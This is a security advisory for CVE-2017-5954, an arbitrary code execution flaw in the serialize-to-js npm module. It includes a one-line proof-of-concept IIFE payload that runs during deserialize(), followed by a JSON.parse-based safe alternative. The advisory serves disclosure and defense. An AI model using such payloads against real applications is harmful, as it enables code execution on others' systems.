Code Execution Through IIFE

Module: serialize-to-js

Published: February 10th, 2017

Reported by: Ajin Abraham

CVE-2017-5954

CWE-502

Vulnerable: <=0.5.0
Patched: >=1.0.0

Overview

Affected versions of serialize-to-js are vulnerable to arbitrary code execution: a string passed to deserialize() can contain an Immediately Invoked Function Expression (IIFE), and that function runs while the string is being deserialized.

Proof of Concept

var serialize = require('serialize-to-js');
// The serialized string carries an IIFE instead of plain data; deserialize()
// evaluates the string, so the function body runs during deserialization.
var payload = "{e: (function(){ eval('console.log(`exploited`)') })() }";
serialize.deserialize(payload);

Remediation

Update to version 1.0.0 or later, and review the author's disclaimer on deserialize (see References).
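The root cause is that deserialize() treats its input as JavaScript source, so data and code are not separated. The following is an added example, not serialize-to-js code: it shows the defensive alternative for untrusted input, a data-only format parsed with JSON.parse (which never evaluates expressions), with Date and RegExp carried as tagged objects rather than as source text. The tag name `$type` and the function names are assumptions of this example; the advisory's payload is rejected as a syntax error instead of being run.

```javascript
// Added example (not serialize-to-js code): a data-only serialize/deserialize
// pair. JSON.parse builds objects from tokens and never evaluates expressions,
// so an IIFE embedded in the input is a SyntaxError, not code that runs.

// Encode Date and RegExp as tagged plain objects. Note `this[key]` rather than
// `v`: JSON.stringify calls Date#toJSON before the replacer sees the value,
// so `v` is already an ISO string while `this[key]` is still the Date.
function safeSerialize(value) {
  return JSON.stringify(value, function (key, v) {
    const raw = this[key];
    if (raw instanceof Date) return { $type: 'Date', value: raw.toISOString() };
    if (raw instanceof RegExp) return { $type: 'RegExp', source: raw.source, flags: raw.flags };
    return v;
  });
}

// Revive only the tagged types we know; anything else tagged is rejected.
function safeDeserialize(text) {
  if (typeof text !== 'string') throw new TypeError('expected a string');
  return JSON.parse(text, (key, v) => {
    if (v && typeof v === 'object' && typeof v.$type === 'string') {
      if (v.$type === 'Date') return new Date(v.value);
      if (v.$type === 'RegExp') return new RegExp(v.source, v.flags);
      throw new SyntaxError('unknown tagged type: ' + v.$type);
    }
    return v;
  });
}

// Wrapper for untrusted input: returns a result object instead of throwing,
// and never executes anything contained in `text`.
function tryDeserialize(text) {
  try {
    return { ok: true, value: safeDeserialize(text) };
  } catch (e) {
    return { ok: false, error: e.name + ': ' + e.message };
  }
}

// The advisory's payload (constructed here from the PoC above) is not valid
// JSON: the unquoted key and the function expression are rejected by the
// tokenizer before anything could be evaluated.
const ADVISORY_PAYLOAD = "{e: (function(){ eval('console.log(`exploited`)') })() }";

// Benign data round-trips, including the non-JSON types, with no code path.
const SAMPLE = { when: new Date('2017-02-10T00:00:00.000Z'), re: /ab+c/gi, n: 1 };
```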

References

https://www.npmjs.com/package/serialize-to-js#deserialize